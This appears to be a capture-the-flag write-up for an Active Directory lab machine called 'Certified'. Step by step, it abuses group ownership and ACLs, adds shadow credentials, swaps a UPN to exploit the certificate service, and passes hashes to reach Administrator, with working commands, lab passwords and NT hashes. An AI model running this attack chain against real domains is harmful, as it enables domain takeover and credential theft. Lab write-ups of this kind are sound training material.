Explore the fundamentals of cybersecurity in the Certified Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.41 cerified.htb

Script to add hosts automatically

ip="10.10.11.41"
domain="cerified.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV cerified.htb

Nmap scan report for certified.htb (10.10.11.41)
Host is up (0.050s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-07 08:07:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-11-07T08:08:20
|_  start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

System Info:

  • User: judith.mader
  • Password: judith09

Run BloodHound Data Collection:

bloodhound-python -d certified.htb -c All -ns 10.10.11.41 --zip -u judith.mader -p judith09 --use-ldap

Resolving Clock Skew Issues

Synchronize System Time:

  • Check current time offset using NTP:
ntpdate -q 10.10.11.41

Adjust Time for Commands:

  • Define a function to adjust time for applications (requires libfaketime):
fakedate() {
   /usr/bin/faketime "$(date -d "$(date) $(echo "$(ntpdate -q 10.10.11.41)" | awk '/offset/ {print $10}' | sed 's/,$//') seconds" "+%Y-%m-%d %H:%M:%S")" "$@"
}

Execute Time-Sensitive Command:

  • Run the Kerberos-related command with correct timing:
fakedate GetUserSPNs.py certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 -request

Note: No need to crack the password; this is just to verify that it works.

Privilege Escalation

Set Judith as Owner of Management Group:

bloodyad --host 10.10.11.41 -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader

Grant Judith Write Permissions for Management Members:

dacledit.py 'certified.htb/judith.mader:judith09' -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB'

Add Judith to the Management Group:

net rpc group addmem "Management" "judith.mader" -I 10.10.11.41 -U 'certified.htb\judith.mader%judith09'

PyWhisker AD Management Setup:

git clone https://github.com/0xPreDa/pywhisker
cd pywhisker
pipx ensurepath
pipx install .
pywhisker -d certified.htb --dc-ip 10.10.11.41 -u 'judith.mader' -p 'judith09' -t 'management_svc' --action add

Encountering "[!] Unsupported hash type MD4" in PyWhisker? Enable legacy algorithms in OpenSSL to resolve this:

  1. Edit OpenSSL config:

    sudo nano /etc/ssl/openssl.cnf

  2. Add the following to enable MD4:

    [provider_sect]
default = default_sect
legacy = legacy_sect

[default_sect]
activate = 1

[legacy_sect]
activate = 1

For more info, see this GitHub issue.

Get TGT Using PKINIT :

fakedate gettgtpkinit -cert-pfx $(pwd)/<file>.pfx -pfx-pass '<psw>' -dc-ip 10.10.11.41 certified.htb/management_svc management_svc.ccache

Set ccache and Retrieve NT Hash:

export KRB5CCNAME=management_svc.ccache
fakedate getnthash certified.htb/management_svc -key <key>
  • Result: NT hash for management_svc is a091c1832bcdd4677c28b5a6a1295584.
evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584

Retrieve User Flag

type \users\management_svc\desktop\user.txt

Impersonate the ca_operator with the management_svc since DACL (Discretionary Access Control List) grants all permissions.

fakedate certipy shadow auto -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -account ca_operator
  • Result: NT hash for ca_operator is b4b86f45c6018f1b664f70805f45d8f2.

Update UPN for ca_operator:

certipy account update -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator

Request Certificate for Administrator Privileges:

certipy req -username 'ca_operator@certified.htb' -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -target 'DC01.certified.htb' -ca 'certified-DC01-CA' -dc-ip 10.10.11.41 -template CertifiedAuthentication -debug

Restore UPN for ca_operator:

certipy account update -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn "ca_operator@certified.htb"

Authenticate as Administrator:

fakedate certipy auth -pfx administrator.pfx -domain "certified.htb"

Execute Remote Command as Administrator:

psexec.py administrator@certified.htb -hashes :0d5b49608bbce1751f708748f67e2d34

Retrieve User Flag

type \users\administrator\desktop\root.txt